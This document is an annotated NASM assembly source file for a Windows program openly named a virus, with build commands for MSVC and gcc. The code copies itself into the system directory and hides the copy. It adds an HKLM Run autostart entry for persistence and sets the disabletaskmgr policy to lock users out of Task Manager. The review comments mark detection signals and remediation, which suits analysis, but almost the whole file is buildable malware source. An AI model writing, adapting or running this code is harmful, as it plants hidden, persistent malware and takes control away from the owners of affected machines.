virus.asm
  1. ; 1. get libs from MS SDK or MASM32 package
  2. ; 2. nasm virus.asm -fwin32
  3.  
  4. ; 3. a) msvc:
  5. ; link.exe virus.obj "%LIBPATH%\kernel32.lib" "%LIBPATH%\user32.lib" "%LIBPATH%\advapi32.lib" /ENTRY:main /SUBSYSTEM:WINDOWS
  6.  
  7. ; 3. b) cygwin/gcc:
  8. ; gcc virus.obj "$LIBPATH/kernel32.lib" "$LIBPATH/user32.lib" "$LIBPATH/advapi32.lib" -mwindows -nostdlib -Xlinker -e_main -s -o virus.exe
  9.  
section .data    data  align=4   ;read/write

; Initialised, writable data. Every string below is a NUL-terminated ANSI
; string consumed by the *A Win32 APIs called from _main.
; NOTE(review): the strings are declared with `dd` rather than `db`; NASM
; pads a string constant to the operand size, so each string carries extra
; zero bytes before the explicit 0x00. Harmless for NUL-terminated readers,
; but `db` is the conventional form — confirm the assembled bytes if the
; exact lengths matter.
Key_Value  dd 0x01                      ; REG_DWORD payload (1) written under Task_Man_Key
Virus_Name  dd "\virus.exe",0x00        ; file name appended to the system directory path
length equ $-Virus_Name                 ; byte count of Virus_Name incl. padding + terminator;
                                        ; used as the movsb count in _main
Reg_Name  dd "Virus",0x00               ; name of the REG_SZ value written under Run
Run dd "Software\Microsoft\Windows\CurrentVersion\Run",0x00
                                        ; autostart key (opened under HKLM in _main) — a
                                        ; well-known persistence location; writes here are a
                                        ; detection signal
Task_Man  dd "Software\Microsoft\Windows\CurrentVersion\Policies\System",0x00
                                        ; policy key (created under HKCU in _main)
Task_Man_Key dd "disabletaskmgr",0x00   ; policy value name; set to Key_Value (1) in _main
szTitle   dd  "Virus:",0x00             ; MessageBoxA caption
szText   dd  "Hello World!",0x00        ; MessageBoxA text
  21.  
  22.  
section .bss      bss   align=4  ;read/write

; Zero-initialised storage. Both path buffers are MAX_PATH (260) bytes,
; matching the 0x0104 size argument passed to the Get* APIs in _main.
Virus_Handle resd 1     ; HMODULE of this image (GetModuleHandleA result)
Key_Handle  resd 1      ; HKEY output slot shared by both registry sequences in _main
String_Length resd 1    ; NOTE(review): never referenced — the string length is kept in edi instead
Virus_Path resb 260     ; full path of the running executable (GetModuleFileNameA)
Sys_Dir resb 260        ; system directory, later extended in place with Virus_Name
  30.  
  31.  
  32. ;section .rdata rdata align=4    ;read
  33.  
section .text     code  align=16    ;read/execute

global _main                        ; process entry point (/ENTRY:main, -e_main in the build
                                    ; notes above); Win32 COFF adds the leading underscore

; All imports are referenced through their __imp__Name@N symbols, i.e. the
; import-table slots, and are called indirectly (`call [__imp__...]`) in
; _main. The @N suffix is the stdcall argument size in bytes.

;kernel32.dll
extern __imp__ExitProcess@4
extern __imp__GetModuleHandleA@4
extern __imp__GetModuleFileNameA@12
extern __imp__GetSystemDirectoryA@8
extern __imp__CopyFileA@12
extern __imp__SetFileAttributesA@8

;user32.dll
extern __imp__MessageBoxA@16

;advapi32.dll — registry access (persistence and policy writes below)
extern __imp__RegCreateKeyExA@36
extern __imp__RegOpenKeyExA@20
extern __imp__RegSetValueExA@24
extern __imp__RegCloseKey@4
  54.  
; NOTE(review): _main is emitted into a separate `.code` section, not the
; `.text` section declared above that holds the extern/global directives.
section .code USE32

;-----------------------------------------------------------------------
; void _main(void)   — process entry point, never returns (ExitProcess)
; ABI:   Win32 stdcall callees; every API is called through its IAT slot
; In:    nothing
; Out:   does not return
; Clobb: eax, ecx, edx, esi, edi, flags. esi/edi are overwritten without
;        being saved; tolerable only because this is the entry point and
;        control never returns to a caller.
;
; Sequence (each step is an observable host artefact for detection):
;   1. resolve own image path                       -> Virus_Path
;   2. system directory + "\virus.exe"              -> Sys_Dir
;   3. copy self to Sys_Dir, mark hidden/system/readonly/archive
;   4. HKLM\...\CurrentVersion\Run : "Virus" = Sys_Dir   (autostart persistence)
;   5. HKCU\...\Policies\System : disabletaskmgr = 1     (Task Manager policy)
;   6. message box, ExitProcess(0)
; No return value is checked anywhere: steps 3 and 4 require rights a
; standard (non-elevated) user does not have, and the code continues
; regardless of whether they succeeded.
;-----------------------------------------------------------------------
_main:

    push 0x00
    call [__imp__GetModuleHandleA@4]        ; GetModuleHandleA(NULL) -> HMODULE of this image
    mov  [Virus_Handle],eax  ;Get Handle of virus

    push 0x0104                ;MAX_PATH
    push Virus_Path
    push dword [Virus_Handle]
    call [__imp__GetModuleFileNameA@12] ;Get path of virus
                                        ; GetModuleFileNameA(hModule, Virus_Path, 260)

    push 0x0104                   ;MAX_PATH
    push Sys_Dir
    call [__imp__GetSystemDirectoryA@8] ;Find System32
                                        ; eax = length written (excluding the terminator)

    ; Append Virus_Name at Sys_Dir + eax. No bounds check: eax + length is
    ; assumed to fit in the 260-byte buffer, and eax = 0 (failure) or a
    ; "buffer too small" return is not detected.
    mov  edi,Sys_Dir
    add  edi,eax                            ; edi -> terminator of the system dir string
    mov  esi,Virus_Name
    mov ecx, length                         ; includes Virus_Name's padding + terminator
    cld
    repe  movsb  ;Append virus name to system32 path
                 ; NOTE(review): movsb sets no flags, so `repe` acts as plain `rep`

    push 0x00                               ; bFailIfExists = FALSE -> overwrite an existing file
    push Sys_Dir                            ; destination: <system dir>\virus.exe
    push Virus_Path                         ; source: this executable
    call [__imp__CopyFileA@12]  ;Copy Virus
                                ; return ignored; writing into the system directory
                                ; fails silently without elevation

    push 0x20|0x02|0x01|0x04 ;FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM
    push Sys_Dir
    call [__imp__SetFileAttributesA@8] ;Set virus attributes
                                       ; hidden+system hides the copy from default Explorer views

    ; RegOpenKeyExA(HKEY_LOCAL_MACHINE, Run, 0, KEY_SET_VALUE, &Key_Handle)
    push Key_Handle                         ; phkResult
    push 0x0002 ;KEY_SET_VALUE
    push 0x00                               ; ulOptions
    push Run
    push 0x80000002 ;HKEY_LOCAL_MACHINE
    call [__imp__RegOpenKeyExA@20]   ;Open Run key
                                     ; return ignored; on failure Key_Handle keeps its
                                     ; previous (zero) contents and the next call uses it

    ; strlen(Sys_Dir) via scasb. The result lands in EDI, not ECX (the
    ; original comment was wrong): after the scan edi points one past the
    ; NUL, so edi - Sys_Dir = length + 1, which is the cbData REG_SZ expects.
    mov  edi,Sys_Dir    ;Calculate size of string, result left in EDI
    mov ecx,-1                              ; scan "forever"; stops on the NUL
    xor al,al                               ; byte to search for
     
    repne scasb
    sub edi,Sys_Dir                         ; edi = byte count including terminator

    ; RegSetValueExA(hKey, "Virus", 0, REG_SZ, Sys_Dir, edi)
    push edi                                ; cbData
    push Sys_Dir                            ; lpData = path of the dropped copy
    push 0x01                               ; dwType = REG_SZ
    push 0x00                               ; Reserved
    push Reg_Name                           ; lpValueName = "Virus"
    push dword [Key_Handle]
    call [__imp__RegSetValueExA@24]  ;Set registry value
                                     ; autostart entry under HKLM\...\Run

    push dword [Key_Handle]
    call [__imp__RegCloseKey@4]

    xor  eax,eax
    mov  dword [Key_Handle],eax ;Clear Key handle before reusing the slot below
     
    ; RegCreateKeyExA(HKEY_CURRENT_USER, Task_Man, 0, NULL, 0, KEY_WRITE,
    ;                 NULL, &Key_Handle, NULL) — creates the key if absent
    push 0x00                               ; lpdwDisposition
    push Key_Handle                         ; phkResult
    push 0x00                               ; lpSecurityAttributes
    push 0x20006 ;KEY_WRITE
    push 0x00                               ; dwOptions
    push 0x00                               ; lpClass
    push 0x00                               ; Reserved
    push Task_Man
    push 0x80000001 ;HKEY_CURRENT_USER
    call [__imp__RegCreateKeyExA@36]        ; return ignored
    ; RegSetValueExA(hKey, "disabletaskmgr", 0, REG_DWORD, &Key_Value, 4)
    push 0x04                               ; cbData = sizeof(DWORD)
    push Key_Value                          ; lpData -> 1
    push 0x04 ;REG_DWORD
    push 0x00                               ; Reserved
    push Task_Man_Key
    push dword [Key_Handle]
    call [__imp__RegSetValueExA@24]  ;Disable taskmanager
                                     ; HKCU policy value; reverting it (value 0 or delete)
                                     ; is the remediation
    push dword [Key_Handle]
    call [__imp__RegCloseKey@4]

    ; MessageBoxA(NULL, szText, szTitle, MB_OK|MB_ICONINFORMATION)
    push 0x00|0x40 ;MB_OK|MB_ICONINFORMATION
    push szTitle
    push szText
    push 0x00                               ; hWnd = NULL
    call [__imp__MessageBoxA@16]   ;Popup Info box

    push 0x00
    call [__imp__ExitProcess@4]   ;Exit — never returns, so no `ret` follows